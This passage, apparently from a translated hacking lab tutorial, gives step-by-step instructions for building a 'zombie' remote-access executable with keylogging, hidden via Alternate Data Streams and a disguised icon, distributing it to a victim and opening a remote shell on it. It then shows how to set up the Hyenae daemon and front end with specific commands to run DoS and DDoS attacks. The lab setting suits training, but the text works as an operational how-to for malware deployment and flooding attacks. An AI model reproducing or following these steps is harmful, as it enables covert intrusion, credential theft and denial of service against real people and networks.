o Copy File: enter a name of the form .exe or .scr
o We can choose Copy to Alternate Data Stream to hide the file

Click Next; the program moves to the Advance section. We can choose features such as Key logger and Format as PE

Click Next; the program moves to the Build section. We can change the zombie file's icon, click Generate, and choose the storage location and the zombie file name

On the attacker machine, we use the New Client feature to manage the connections from the zombies, choosing the name of the Profile the attacker created.

The program asks us to enter the PASSWORD or to LOAD KEY, depending on the password method configured above

Next we distribute the zombie file dos_server.exe

After the client runs dos_server.exe, we check the connections and see one connection appear

We double-click the line representing the client; it shows all the tasks the attacker can perform on the zombie (depending on the initial configuration)

For example we choose Remote Shell and Active to get the zombie's command-line interface


7. DoS and DDoS with the Hyenae tool
- Download the program at http://sourceforge.net/projects/hyenae/files/
This program lets us perform DoS and DDoS attacks. To perform DDoS we must install the Hyenae daemon on one machine, then use Hyenae Front End (the GUI) or Hyenae (the command line) to control it
- In this lab we install the Hyenae daemon on a Windows Server 2003 machine (192.168.1.100/24) and use Windows XP (192.168.1.101/24) as the controlling client.

First we configure hyenaed; check the network cards in the computer
C:\> hyenaed.exe -l   checks which network cards the program recognises
Suppose the program recognises the Intel Pro/1000 MT card as number 1
Configure hyenaed.exe to listen on the Server 2003 machine
C:\> hyenaed.exe -I 1 -a 192.168.1.100 -p 8888 -u 10000 -k 123abc!!!
-I: the card to bind to
-a: bind to this IP
-p: port
-u: number of packets sent per connection
Use hyenae.exe as the front end to connect